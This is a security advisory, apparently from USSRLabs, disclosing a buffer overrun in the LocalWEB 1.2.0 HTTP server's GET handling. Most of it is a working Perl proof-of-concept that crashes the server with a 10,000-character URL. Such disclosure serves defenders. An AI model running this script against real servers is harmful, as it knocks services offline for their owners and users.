Buffer Overrun in LocalWEB HTTP Server

 
Buffer Overrun in LocalWEB HTTP Server
Reported June 30 by
USSRLabs

VERSIONS AFFECTED
LocalWEB 1.2.0

DESCRIPTION

An unchecked buffer exists in the LocalWEB software"s GET command processing code. By sending the server a GET command with a URL of approximately 10,000 characters the service will crash.

DEMONSTRATION

------------------------Begin PERL Code----------------------
# USSRLabs Advisory Code USSR-2000048

#
#!/usr/bin/perl
#
# ./$0.pl -s <server>
#
# Malformed GET URL request DoS
#
use Getopt::Std;
use Socket;

getopts("s:", \%args);
if(!defined($args\{s\}))\{&usage;\}

my($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);

$foo = "A"; # this is the NOP
$number = "10000"; # this is the total number of NOP
$data .= $foo x $number; # result of $foo times $number
$serv = $args\{s\}; # remote server
$port = 80; # remote port, default is 80
$buf = "GET /$data HTTP/1.0\r\n\r\n"; # issue this response to the
server

$in_addr = (gethostbyname($serv))\[4\] || die("Error: $!\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n");
$proto = getprotobyname("tcp") || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage \{die("\n\n$0 -s <server>\n\n");\}
--------------------------End Code---------------------

VENDOR RESPONSE

The author is aware of the problem but has not released a correct version. WebBBS Home Page

CREDITS
Discovered and reported by USSRLabs

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish